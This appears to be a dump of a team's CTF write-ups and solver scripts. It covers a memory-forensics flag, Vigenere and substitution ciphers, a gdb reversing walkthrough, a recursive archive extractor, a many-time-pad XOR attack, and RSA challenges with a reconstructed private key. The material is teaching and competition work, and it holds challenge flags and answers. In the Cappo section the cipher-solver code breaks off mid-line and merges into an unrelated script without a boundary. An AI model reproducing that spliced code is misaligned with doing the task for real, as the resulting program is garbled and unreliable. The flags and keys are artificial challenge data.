125 | < Server: nginx/1.10.0 (Ubuntu)
126 | < Date: Mon, 12 Dec 2016 11:43:10 GMT
127 | < Content-Type: application/octet-stream
128 | < Content-Length: 36
129 | < Last-Modified: Tue, 06 Dec 2016 07:11:29 GMT
130 | < Connection: keep-alive
131 | < ETag: "584664a1-24"
132 | < Accept-Ranges: bytes
133 | <
134 | SECCON{_h3110_w3_h4ve_fun_w4rg4m3_}
135 | * Connection #0 to host 153.127.200.178 left intact
136 | ```
137 |
138 | The flag is SECCON{_h3110_w3_h4ve_fun_w4rg4m3_}
139 |
140 | ## Links
141 | - http://www.volatilityfoundation.org/
142 |
--------------------------------------------------------------------------------
/2016/seccon/Memory Analysis/memoryanalysis.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/Memory Analysis/memoryanalysis.zip
--------------------------------------------------------------------------------
/2016/seccon/Vigenere/README.md:
--------------------------------------------------------------------------------
1 | #Vigenere - Crypto 100
2 |
3 | As the title for this chall claims, this is all about Vigenere cipher. Interestingly the alphabet used is not [A-Z], but also includes '{' and '}'. Besides giving us a full Vigenere table, the chall also provides some information about the key, the plaintext and the ciphertext.
4 |
5 | ~~~~
6 | k: ????????????
7 | p: SECCON{???????????????????????????????????}
8 | c: LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ
9 |
10 | k=key, p=plain, c=cipher, md5(p)=f528a6ab914c1ecf856a1d93103948fe
11 | ~~~~
12 |
13 | From now on we are going to assume *len(k)==12*. Our main goal is clearly to find *p*. Since we have the first 7 chars of *p* we could easily find the first 7 chars of *c*. We could even use the given table and do it manually. For the first char of *p*, *p[0]=='S'*, we would check the row of the table corresponding to *S*. Since *S* gets mapped to *c[0]=='L'*, we look for *L* in this row, which is in the column of *V*. The figure below ilustrates this process:
14 |
15 | 
16 |
17 | ~~~~
18 | pt = "SECCON{"
19 | ct = "LMIG}RP"
20 |
21 | res = ""
22 | for p,c in zip(pt, ct):
23 | res += chr( ord('A') + ( (ord(c) - ord(p)) % 28) )
24 |
25 | print(res)
26 | ~~~~
27 |
28 | This simple procedure results in *VIGESEN* as the first part of the key. Evidently the chars '{' and '}' are not being correctly treated in positions 5 and 7. Either by correcting them manually or by guessing, we might deduce that *VIGENER* is indeed the first part. It is not hard to find that *VIGENERE* are the first 8 chars of the key.
29 |
30 | We have the following result so far:
31 |
32 | ~~~~
33 | P: SECCON{A_ _ _ _BCDEDEFG_ _ _ _KLMNOPQR_ _ _ _VWXYYZ}
34 | K: VIGENERE_ _ _ _VIGENERE_ _ _ _VIGENERE_ _ _ _VIGENER
35 | C: LMIG}RPED O E EWKJIQIWKJ W M NDTSR}TFVU F W YOCBAJBQ
36 | ~~~~
37 |
38 | It seems the alphabet is part of *p*. After *G* there might be *HIJ_* or maybe *_HIJ*. The same goes for *STU_* or *_STU* right after *R*. Before going for a bruteforce solution we decided to test a few possibilities manually. We tried *H* in position 23 and *S* in position 32. Surprisingly, we got *C* as the result for the key in both cases. Certainly a good sign. Trying the other chars we got *VIGENERECOD_* for the key. Not hard to guess the answer should be *VIGENERECODE*, proving our first guess was correct!
39 |
40 | With the key in hands all we had to do was decode the ciphertext in order to obtain **SECCON{ABABABCDEDEFGHIJJKLMNOPQRSTTUVWXYYZ}**.
41 |
42 | Although we used a lot of guessing to make things quicker, our next approach would be bruteforcing the given md5 hash. In fact, we decided to confirm our guesses with a little coding:
43 |
44 | ~~~~
45 | import itertools
46 | import hashlib
47 | import binascii
48 |
49 | hashChall = "f528a6ab914c1ecf856a1d93103948fe"
50 | res = ""
51 |
52 | # the range could include the whole alphabet for more extensive search
53 | for a in itertools.product("AB",repeat=4):
54 | for b in itertools.product("HIJJ",repeat=4):
55 | for c in itertools.product("STTU",repeat=4):
56 | pt = "SECCON{A"+"".join(a)+"BCDEDEFG"+"".join(b)+"KLMNOPQR"+"".join(c)+"VWXYYZ}"
57 | hashTst = hashlib.md5(pt.encode('utf-8')).hexdigest()
58 | if hashTst == hashChall:
59 | res = pt
60 | print(res)
61 | ~~~~
62 |
--------------------------------------------------------------------------------
/2016/seccon/Vigenere/vigenere.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/Vigenere/vigenere.png
--------------------------------------------------------------------------------
/2016/seccon/voip/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/voip/1.jpg
--------------------------------------------------------------------------------
/2016/seccon/voip/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/voip/2.jpg
--------------------------------------------------------------------------------
/2016/seccon/voip/README.MD:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/voip/README.MD
--------------------------------------------------------------------------------
/2016/seccon/voip/voip.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/seccon/voip/voip.pcap
--------------------------------------------------------------------------------
/2016/sharifctf/rev-50/README.md:
--------------------------------------------------------------------------------
1 | # Getit
2 |
3 | ## Description
4 | Open and read the flag file!
5 |
6 | ## Solution
7 |
8 | After download the getit file we need to take a look what kind of file we are working on.
9 | ```bash
10 | file getit
11 | getit: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=e389cd7a4b9272ba80f85d7eb604176f6106c61e, not stripped
12 | ```
13 |
14 | Let's run the file
15 | ```
16 | ./getit
17 | ```
18 |
19 | We got any return, so let's check the file with the strings command
20 | ```bash
21 | strings getit
22 | /lib64/ld-linux-x86-64.so.2
23 | libc.so.6
24 | fopen
25 | __stack_chk_fail
26 | strlen
27 | fseek
28 | fputc
29 | fclose
30 | remove
31 | fprintf
32 | __libc_start_main
33 | __gmon_start__
34 | GLIBC_2.4
35 | GLIBC_2.2.5
36 | fffff.
37 | /tmp/flaH
38 | g.txf
39 | []A\A]A^A_
40 | ;*3$"
41 | c61b68366edeb7bdce3c6820314b7498
42 | SharifCTF{????????????????????????????????}
43 | *******************************************
44 | [...]
45 | ```
46 |
47 | So we got some kind of string about the flag in hex above the SharifCTF line but it does not work, another interesting thing we have in the output is the /tmp/flaHg.txf, so let's check the calls
48 | ```bash
49 | ltrace ./getit
50 | __libc_start_main(0x400756, 1, 0x7ffdc20a5348, 0x4008f0
51 | strlen("c61b68366edeb7bdce3c6820314b7498"...) = 32
52 | strlen("c61b68366edeb7bdce3c6820314b7498"...) = 32
53 | strlen("c61b68366edeb7bdce3c6820314b7498"...) = 32
54 | [...]
55 | fopen("/tmp/flag.txt", "w") = 0x144b010
56 | fprintf(0x144b010, "%s\n", "********************************"...) = 44
57 | strlen("SharifCTF{b70c59275fcfa8aebf2d59"...) = 43
58 | fseek(0x144b010, 30, 0, 30) = 0
59 | fputc('5', 0x144b010) = 53
60 | fseek(0x144b010, 0, 0, 0) = 0
61 | fprintf(0x144b010, "%s\n", "********************************"...) = 44
62 | strlen("SharifCTF{b70c59275fcfa8aebf2d59"...) = 43
63 | fseek(0x144b010, 24, 0, 24) = 0
64 | fputc('a', 0x144b010) = 97
65 | fseek(0x144b010, 0, 0, 0) = 0
66 | [...]
67 | fputc('{', 0x144b010) = 123
68 | fseek(0x144b010, 0, 0, 0) = 0
69 | fprintf(0x144b010, "%s\n", "********************************"...) = 44
70 | strlen("SharifCTF{b70c59275fcfa8aebf2d59"...) = 43
71 | fclose(0x144b010) = 0
72 | remove("/tmp/flag.txt") = 0
73 | +++ exited (status 0) +++
74 | ```
75 |
76 | As we can see above we have the fopen function to a /tmp/flag.txt file, but in the end of the output we have the remove function to get rid of the file. So let's open the file into the gdb
77 | ```
78 | gdb -q
79 | (gdb) file getit
80 | Reading symbols from getit...(no debugging symbols found)...done.
81 | (gdb) set disassembly-flavor intel
82 | (gdb) disassemble main
83 | Dump of assembler code for function main:
84 | 0x0000000000400756 <+0>: push rbp
85 | 0x0000000000400757 <+1>: mov rbp,rsp
86 | 0x000000000040075a <+4>: push rbx
87 | 0x000000000040075b <+5>: sub rsp,0x38
88 | 0x000000000040075f <+9>: mov rax,QWORD PTR fs:0x28
89 | 0x0000000000400768 <+18>: mov QWORD PTR [rbp-0x18],rax
90 | 0x000000000040076c <+22>: xor eax,eax
91 | 0x000000000040076e <+24>: mov DWORD PTR [rbp-0x40],0x0
92 | 0x0000000000400775 <+31>: mov eax,DWORD PTR [rbp-0x40]
93 | 0x0000000000400778 <+34>: movsxd rbx,eax
94 | 0x000000000040077b <+37>: mov edi,0x6010a0
95 | 0x0000000000400780 <+42>: call 0x4005e0
96 | 0x0000000000400785 <+47>: cmp rbx,rax
97 | 0x0000000000400788 <+50>: jae 0x4007c7
98 | 0x000000000040078a <+52>: mov eax,DWORD PTR [rbp-0x40]
99 | 0x000000000040078d <+55>: lea edx,[rax+0xa]
100 | 0x0000000000400790 <+58>: mov eax,DWORD PTR [rbp-0x40]
101 | 0x0000000000400793 <+61>: cdqe
102 | 0x0000000000400795 <+63>: movzx eax,BYTE PTR [rax+0x6010a0]
103 | 0x000000000040079c <+70>: mov ecx,eax
104 | 0x000000000040079e <+72>: mov eax,DWORD PTR [rbp-0x40]
105 | 0x00000000004007a1 <+75>: and eax,0x1
106 | 0x00000000004007a4 <+78>: test eax,eax
107 | 0x00000000004007a6 <+80>: je 0x4007af
108 | 0x00000000004007a8 <+82>: mov eax,0x1
109 | 0x00000000004007ad <+87>: jmp 0x4007b4
110 | 0x00000000004007af <+89>: mov eax,0xffffffff
111 | 0x00000000004007b4 <+94>: add eax,ecx
112 | 0x00000000004007b6 <+96>: mov ecx,eax
113 | 0x00000000004007b8 <+98>: movsxd rax,edx
114 | 0x00000000004007bb <+101>: mov BYTE PTR [rax+0x6010e0],cl
115 | 0x00000000004007c1 <+107>: add DWORD PTR [rbp-0x40],0x1
116 | 0x00000000004007c5 <+111>: jmp 0x400775
117 | 0x00000000004007c7 <+113>: movabs rax,0x616c662f706d742f
118 | 0x00000000004007d1 <+123>: mov QWORD PTR [rbp-0x30],rax
119 | 0x00000000004007d5 <+127>: mov DWORD PTR [rbp-0x28],0x78742e67
120 | 0x00000000004007dc <+134>: mov WORD PTR [rbp-0x24],0x74
121 | 0x00000000004007e2 <+140>: lea rax,[rbp-0x30]
122 | 0x00000000004007e6 <+144>: mov esi,0x400974
123 | 0x00000000004007eb <+149>: mov rdi,rax
124 | 0x00000000004007ee <+152>: call 0x400650
125 | 0x00000000004007f3 <+157>: mov QWORD PTR [rbp-0x38],rax
126 | 0x00000000004007f7 <+161>: mov rax,QWORD PTR [rbp-0x38]
127 | 0x00000000004007fb <+165>: mov edx,0x601120
128 | ---Type to continue, or q to quit---
129 | 0x0000000000400800 <+170>: mov esi,0x400976
130 | 0x0000000000400805 <+175>: mov rdi,rax
131 | 0x0000000000400808 <+178>: mov eax,0x0
132 | 0x000000000040080d <+183>: call 0x400620
133 | 0x0000000000400812 <+188>: mov DWORD PTR [rbp-0x3c],0x0
134 | 0x0000000000400819 <+195>: mov eax,DWORD PTR [rbp-0x3c]
135 | 0x000000000040081c <+198>: movsxd rbx,eax
136 | 0x000000000040081f <+201>: mov edi,0x6010e0
137 | 0x0000000000400824 <+206>: call 0x4005e0
138 | 0x0000000000400829 <+211>: cmp rbx,rax
139 | 0x000000000040082c <+214>: jae 0x4008b5
140 | 0x0000000000400832 <+220>: mov eax,DWORD PTR [rbp-0x3c]
141 | 0x0000000000400835 <+223>: cdqe
142 | 0x0000000000400837 <+225>: mov eax,DWORD PTR [rax*4+0x601160]
143 | 0x000000000040083e <+232>: movsxd rcx,eax
144 | 0x0000000000400841 <+235>: mov rax,QWORD PTR [rbp-0x38]
145 | 0x0000000000400845 <+239>: mov edx,0x0
146 | 0x000000000040084a <+244>: mov rsi,rcx
147 | 0x000000000040084d <+247>: mov rdi,rax
148 | 0x0000000000400850 <+250>: call 0x400640
149 | 0x0000000000400855 <+255>: mov eax,DWORD PTR [rbp-0x3c]
150 | 0x0000000000400858 <+258>: cdqe
151 | 0x000000000040085a <+260>: mov eax,DWORD PTR [rax*4+0x601160]
152 | 0x0000000000400861 <+267>: cdqe
153 | 0x0000000000400863 <+269>: movzx eax,BYTE PTR [rax+0x6010e0]
154 | 0x000000000040086a <+276>: movsx eax,al
155 | 0x000000000040086d <+279>: mov rdx,QWORD PTR [rbp-0x38]
156 | 0x0000000000400871 <+283>: mov rsi,rdx
157 | 0x0000000000400874 <+286>: mov edi,eax
158 | 0x0000000000400876 <+288>: call 0x400600
159 | 0x000000000040087b <+293>: mov rax,QWORD PTR [rbp-0x38]
160 | 0x000000000040087f <+297>: mov edx,0x0
161 | 0x0000000000400884 <+302>: mov esi,0x0
162 | 0x0000000000400889 <+307>: mov rdi,rax
163 | 0x000000000040088c <+310>: call 0x400640
164 | 0x0000000000400891 <+315>: mov rax,QWORD PTR [rbp-0x38]
165 | 0x0000000000400895 <+319>: mov edx,0x601120
166 | 0x000000000040089a <+324>: mov esi,0x400976
167 | 0x000000000040089f <+329>: mov rdi,rax
168 | 0x00000000004008a2 <+332>: mov eax,0x0
169 | 0x00000000004008a7 <+337>: call 0x400620
170 | 0x00000000004008ac <+342>: add DWORD PTR [rbp-0x3c],0x1
171 | 0x00000000004008b0 <+346>: jmp 0x400819
172 | 0x00000000004008b5 <+351>: mov rax,QWORD PTR [rbp-0x38]
173 | 0x00000000004008b9 <+355>: mov rdi,rax
174 | ---Type to continue, or q to quit---
175 | 0x00000000004008bc <+358>: call 0x4005d0
176 | 0x00000000004008c1 <+363>: lea rax,[rbp-0x30]
177 | 0x00000000004008c5 <+367>: mov rdi,rax
178 | 0x00000000004008c8 <+370>: call 0x4005c0
179 | 0x00000000004008cd <+375>: mov eax,0x0
180 | 0x00000000004008d2 <+380>: mov rbx,QWORD PTR [rbp-0x18]
181 | 0x00000000004008d6 <+384>: xor rbx,QWORD PTR fs:0x28
182 | 0x00000000004008df <+393>: je 0x4008e6
183 | 0x00000000004008e1 <+395>: call 0x4005f0 <__stack_chk_fail@plt>
184 | 0x00000000004008e6 <+400>: add rsp,0x38
185 | 0x00000000004008ea <+404>: pop rbx
186 | 0x00000000004008eb <+405>: pop rbp
187 | 0x00000000004008ec <+406>: ret
188 | End of assembler dump.
189 | (gdb)
190 | ```
191 |
192 | Here we need to create a break point in, right before the remove call, so we can take a look at the output file.
193 | ```
194 | 0x00000000004008bc <+358>: call 0x4005d0
195 | ```
196 |
197 | Let's create the break point and run
198 | ```
199 | (gdb) break *0x00000000004008bc
200 | Breakpoint 1 at 0x4008bc
201 | (gdb) run
202 | Starting program: /tmp/getit
203 |
204 | Breakpoint 1, 0x00000000004008bc in main ()
205 | (gdb)
206 | ```
207 |
208 | Now we can check the output of the flag.txt into the tmp directory
209 | ```bash
210 | cat /tmp/flag.txt
211 | *********{*********************************
212 | ```
213 |
214 | Back in the output of ltrace we have a strlen call right after the fprintf
215 | ```bash
216 | fopen("/tmp/flag.txt", "w") = 0x8f8010
217 | fprintf(0x8f8010, "%s\n", "********************************"...) = 44
218 | strlen("SharifCTF{b70c59275fcfa8aebf2d59"...) = 43
219 | ```
220 |
221 |
222 | So the output file does not have the correct flag value, so let's back to the gdb. Quit the current session and let's open another.
223 | ```bash
224 | gdb -q
225 | (gdb) file getit
226 | Reading symbols from getit...(no debugging symbols found)...done.
227 | (gdb) set disassembly-flavor intel
228 | (gdb) disassemble main
229 | [...]
230 | 0x00000000004007ee <+152>: call 0x400650
231 | 0x00000000004007f3 <+157>: mov QWORD PTR [rbp-0x38],rax
232 | 0x00000000004007f7 <+161>: mov rax,QWORD PTR [rbp-0x38]
233 | 0x00000000004007fb <+165>: mov edx,0x601120
234 | ---Type to continue, or q to quit---
235 | 0x0000000000400800 <+170>: mov esi,0x400976
236 | 0x0000000000400805 <+175>: mov rdi,rax
237 | 0x0000000000400808 <+178>: mov eax,0x0
238 | 0x000000000040080d <+183>: call 0x400620
239 | 0x0000000000400812 <+188>: mov DWORD PTR [rbp-0x3c],0x0
240 | 0x0000000000400819 <+195>: mov eax,DWORD PTR [rbp-0x3c]
241 | 0x000000000040081c <+198>: movsxd rbx,eax
242 | 0x000000000040081f <+201>: mov edi,0x6010e0
243 | 0x0000000000400824 <+206>: call 0x4005e0
244 | ```
245 |
246 | As we can see here we have the mov of edi right before the strlen call and we have the value of 0x6010e0 let's inspect this guy, let's create a break point in the strlen call and check the value of the 0x6010e0
247 | ```bash
248 | (gdb) break *0x0000000000400824
249 | Breakpoint 1 at 0x400824
250 | (gdb) run
251 | Starting program: /tmp/getit
252 |
253 | Breakpoint 1, 0x0000000000400824 in main ()
254 | ```
255 |
256 | Now let's check the value of 0x6010e0
257 | ```bash
258 | (gdb) x/s 0x6010e0
259 | 0x6010e0 : "SharifCTF{b70c59275fcfa8aebf2d5911223c6589}"
260 | ```
261 |
262 | The flag is: SharifCTF{b70c59275fcfa8aebf2d5911223c6589}
263 |
--------------------------------------------------------------------------------
/2016/sharifctf/rev-50/getit:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/sharifctf/rev-50/getit
--------------------------------------------------------------------------------
/2016/tarfull/arq.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/tarfull/arq.zip
--------------------------------------------------------------------------------
/2016/tarfull/solve.py:
--------------------------------------------------------------------------------
1 | # This solution uses recursion and IS NOT optimized. For better results, go for dynammic programming and use memoization. Or even better, just do the iterative stuff.
2 | import zipfile
3 | import tarfile
4 | import magic
5 | import os
6 | import sys
7 |
8 | def checkType( local ):
9 | if os.path.isdir(local):
10 | return "dir"
11 | else:
12 | return magic.from_file(local, mime=True) # gets file extension by oracle (solves files without explicit extension)
13 |
14 | def extrai( local ):
15 | tipo = checkType(local)
16 | if "text" in tipo:
17 | with open(local) as f:
18 | print(f.readlines())
19 | return
20 | elif tipo=="dir":
21 | return
22 | elif "gzip" in tipo or "bzip2" in tipo:
23 | z = tarfile.open(local)
24 | nameList = z.getnames()
25 | elif "zip" in tipo:
26 | f = open(local, "rb")
27 | z = zipfile.ZipFile(f)
28 | nameList = z.namelist()
29 |
30 | z.close()
31 |
32 | for name in nameList:
33 | if tipo == "dir":
34 | continue
35 | elif name == "solve.py/": # dirty workaround for when the extracted file has the same name of the script
36 | os.rename("solve.py", "bananas.py")
37 | f = open(local, "rb")
38 | z = zipfile.ZipFile(f)
39 | z.extract(name, "")
40 | z.close()
41 | extrai(name)
42 | elif "gzip" in tipo or "bzip2" in tipo:
43 | print("[DEBUG >>>] New tar file: " + name)
44 | z = tarfile.open(local)
45 | z.extract(name, "")
46 | z.close()
47 | extrai(name)
48 | elif "zip" in tipo:
49 | print("[DEBUG >>>] New zip file: " + name)
50 | f = open(local, "rb")
51 | z = zipfile.ZipFile(f)
52 | z.extract(name, "")
53 | z.close()
54 | extrai(name)
55 |
56 | ### ATTENTION: RADIOACTIVE CODE! USE WITH CAUTION ###
57 | sys.setrecursionlimit(3000) # dirty workaround for recursion depth limit
58 | print("[DEBUG >>>] Function zip")
59 | extrai("arq.zip")
60 |
61 | # let's put things back in place :)
62 | os.rename("solve.py/", "rep.py")
63 | os.rename("bananas.py", "solve.py")
64 |
--------------------------------------------------------------------------------
/2017/3DSCTF/cappo/README.md:
--------------------------------------------------------------------------------
1 | # Cappo di Tutti Cappo - 500 pts
2 |
3 | ~~~
4 | Help the FBI
5 |
6 | Server: capoditutticapi01.3dsctf.org
7 |
8 | Port: 8001
9 | ~~~
10 |
11 | Connecting with `nc`:
12 |
13 | ~~~
14 | +++ 3DSCTF - Capo Di Tutti Capi +++
15 |
16 | [+] One year after the death of the one of the most famous members of the
17 | mafia, the FBI found a notebook with a few weird annotations.
18 |
19 | [+] Trying to use the same strategy as the last time, all the FBI experts
20 | failed to translate the book. Look if you have some luck!
21 |
22 | [+] Type start to read the first note: start
23 | Openning the book...
24 |
25 | [+] Page 1/10 [c, r, p]: [ZNEKWSGQXYRMVUDHPBTILFCOJA, 5, SRJYC S ZUQJICK, OVSCLYT KIAC HTURY]
26 | The answer is:
27 | ~~~
28 |
29 | Every round the challenge gave us 3 different elements in the same format:
30 |
31 | 'NEHQAOBYXUGDZMPSKFRIJVWLCT', 2, 'VUB QBJV CHN VK BSVBI KWI QWJGSBJJ GJ VK QB QKIS GSVK GV'
32 |
33 | The first element (`NEHQAOBYXUGDZMPSKFRIJVWLCT`) is always a 26 chars string, a strong indicator of a substitution alphabet. The second element (`2`) is always a number between 1 and 26, which seems like an offset. It could be related to a rotation, like in a Caesar Cipher. The last element is probably the encrypted message itself.
34 |
35 | With these informations in mind we confirmed there were indeed both a substitution and a rotation involved. To decrypt, we first substituted back the message according to the alphabet, and then applied a rotation according to the offset.
36 |
37 | The code below gave us what we needed:
38 |
39 | ~~~
40 | import string
41 | from pwn import *
42 |
43 | def substitute(msg, alphabet):
44 | subs = {}
45 | for x,y in zip(alphabet, string.ascii_uppercase):
46 | subs[x] = y
47 |
48 | subs[' '] = ' '
49 | subs[','] = ','
50 | subs['.'] = '.'
51 |
52 | res = ''
53 | for c in msg:
54 | res += subs[c]
55 |
56 | return res
57 |
58 | def rotate(msg, offset):
59 | res = ''
60 | for c in msg:
61 | if c == ' ':
62 | res += ' '
63 | continue
64 | elif c==',':
65 | res+=','
66 | continue
67 | elif c=='.':
68 | res+='.'
69 | continue
70 | elif ord(c)-ord('A')= 7: knownSpaceIndexes.append(ind)
51 | #print knownSpaceIndexes # Shows all the positions where we now know the key!
52 |
53 | # Now Xor the current_index with spaces, and at the knownSpaceIndexes positions we get the key back!
54 | xor_with_spaces = strxor(ciphertext.decode('hex'),' '*1000)
55 | for index in knownSpaceIndexes:
56 | # Store the key's value at the correct position
57 | final_key[index] = xor_with_spaces[index].encode('hex')
58 | # Record that we known the key at this position
59 | known_key_positions.add(index)
60 |
61 | # Construct a hex key from the currently known key, adding in '00' hex chars where we do not know (to make a complete hex string)
62 | final_key_hex = ''.join([val if val is not None else '00' for val in final_key])
63 | # Xor the currently known key with the target cipher
64 | output = strxor(target_cipher.decode('hex'),final_key_hex.decode('hex'))
65 | # Print the output, printing a * if that character is not known yet
66 | print 'FLAG:'
67 | print ''.join([char if index in known_key_positions else '*' for index, char in enumerate(output)])
68 |
69 | '''
70 | Manual step
71 | '''
72 | # From the output this prints, we can manually complete the target plaintext from:
73 | # The secuet-mes*age*is: Wh** usi|g **str*am cipher, nev***use th* k*y *ore than onc*
74 | # to:
75 | # The secret message is: When using a stream cipher, never use the key more than once
76 |
77 | # We then confirm this is correct by producing the key from this, and decrpyting all the other messages to ensure they make grammatical sense
78 | target_plaintext = "ncryption scheme always." #???
79 | print target_plaintext
80 | key = strxor(target_cipher.decode('hex'),target_plaintext)
81 | print(key)
82 | for cipher in ciphers:
83 | print strxor(cipher.decode('hex'),key)
84 |
--------------------------------------------------------------------------------
/2017/AlexCTF/cr3/README.md:
--------------------------------------------------------------------------------
1 | ~~~~
2 | p=0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
3 |
4 | q=0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
5 |
6 | e=0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41
7 |
8 | c=0x7fe1a4f743675d1987d25d38111fae0f78bbea6852cba5beda47db76d119a3efe24cb04b9449f53becd43b0b46e269826a983f832abb53b7a7e24a43ad15378344ed5c20f51e268186d24c76050c1e73647523bd5f91d9b6ad3e86bbf9126588b1dee21e6997372e36c3e74284734748891829665086e0dc523ed23c386bb520
9 | ~~~~
10 |
11 | The chall gave us some parameters (p, q, e, c), from which we we inferred this is an RSA chall. The whole point is how to code the decryption algorithm
12 |
13 | Wikipedia's RSA page is very illustrative. In order to decrypt all we need to do is:
14 |
15 | m = c^d % n
16 |
17 | Where
18 |
19 | phi(n) = (p-1)*(q-1)
20 | e*d = 1 % phi(n)
21 |
22 | The difficult part was to compute *d*. For some reason (???) we could not find a trivial python3 module for computing numerical stuff. After checking the code recipe at Wikibooks we got the flag.
23 |
--------------------------------------------------------------------------------
/2017/AlexCTF/cr3/cr3.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3.5
2 |
3 | from Crypto.PublicKey import RSA
4 | import binascii
5 |
6 | p=0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
7 |
8 | q=0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
9 |
10 | n = p*q
11 |
12 | e=0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41
13 |
14 | c=0x7fe1a4f743675d1987d25d38111fae0f78bbea6852cba5beda47db76d119a3efe24cb04b9449f53becd43b0b46e269826a983f832abb53b7a7e24a43ad15378344ed5c20f51e268186d24c76050c1e73647523bd5f91d9b6ad3e86bbf9126588b1dee21e6997372e36c3e74284734748891829665086e0dc523ed23c386bb520
15 |
16 | def egcd(a, b):
17 | if a == 0:
18 | return (b, 0, 1)
19 | else:
20 | g, y, x = egcd(b % a, a)
21 | return (g, x - (b // a) * y, y)
22 |
23 | def modinv(a, m):
24 | g, x, y = egcd(a, m)
25 | if g != 1:
26 | raise Exception('modular inverse does not exist')
27 | else:
28 | return x % m
29 |
30 | d = modinv(e, (p-1)*(q-1))
31 | key = RSA.construct((n, e, d, p, q))
32 | pt = hex(key.decrypt(c))
33 |
34 | print(binascii.unhexlify(pt[2:]))
35 |
36 |
--------------------------------------------------------------------------------
/2017/AlexCTF/cr4/README.md:
--------------------------------------------------------------------------------
1 | The idea this time is to crack RSA built with small prime numbers. We first needed to find the public modulus *n* and then factorize it, since:
2 |
3 | n = p*q
4 |
5 | Our code to do it:
6 |
7 | ~~~~
8 | from Crypto.PublicKey import RSA
9 | import gmpy
10 | import base64
11 | import binascii
12 |
13 | with open('key.pub','r') as key:
14 | pub = RSA.importKey(key.read())
15 |
16 | n = int(pub.n)
17 |
18 | print(n)
19 | ~~~~
20 |
21 | [FactorDB](http://factordb.com/) is the best place I know to do it and we got very quickly the results for *p* and *q*:
22 |
23 | ~~~~
24 | # Using factordb
25 | p = 863653476616376575308866344984576466644942572246900013156919
26 | q = 965445304326998194798282228842484732438457170595999523426901
27 | ~~~~
28 |
29 | Now we can rebuild the private key. Instead of doing the same thing we did with CR3, I tried to explore *gmpy* module:
30 |
31 | ~~~~
32 | # We could also use the same algorithm we did with cr3
33 | d = int(gmpy.invert(e,(p-1)\*(q-1)))
34 | print(d)
35 |
36 | pvt = RSA.construct((n, e, d, p, q))
37 |
38 | print(pvt.exportKey().decode())
39 | ~~~~
40 |
41 | And here it is:
42 |
43 | ~~~~
44 | -----BEGIN RSA PRIVATE KEY-----
45 | MIH5AgEAAjJSqZ4knufPPAy/ljoAlmF3K8nN9uHj+/xuRKB6Xg+JRFep+Bw64TKs
46 | VoPTWyi6XDJCQwIDAQABAjIzrQnKBvUPnpCxrK5x85DWuS8dbTtmFP+HEYHE3wja
47 | TF9QEkV6ZDCUBers1jQeQwJ5MQIaAImWgwYMdrnA3lgaaeDqnZG+0Qcb6x2SSjcC
48 | GgCZzedK7e6Hrf/daEy8R451mHC08gaS9lJVAhlmZEB1y+i/LC1L27xXycIhqKPe
49 | aoR6qVfZAhlbPhKLmhFavne/AqQbQhwaWT/rqHUL9EMtAhk5pem+TgbW3zCYF8v7
50 | j0mjJ31NC+0sLmx5
51 | -----END RSA PRIVATE KEY-----
52 | ~~~~
53 |
54 | For some weird reason (which I did not take the time to figure out), python3 was complaining about a charachter when decoding the flag. So instead of struggling with it forever I decided to move on and give OpenSSL a try:
55 |
56 | base64 -d flag.b64 | openssl rsautl -decrypt -inkey key.pvt | cat
57 | ALEXCTF{SMALL_PRIMES_ARE_BAD}
58 |
59 | This above simply decodes the base64 flag and uses openssl to decrypt it. And they sure do :)
60 |
--------------------------------------------------------------------------------
/2017/AlexCTF/cr4/key.pvt:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIH5AgEAAjJSqZ4knufPPAy/ljoAlmF3K8nN9uHj+/xuRKB6Xg+JRFep+Bw64TKs
3 | VoPTWyi6XDJCQwIDAQABAjIzrQnKBvUPnpCxrK5x85DWuS8dbTtmFP+HEYHE3wja
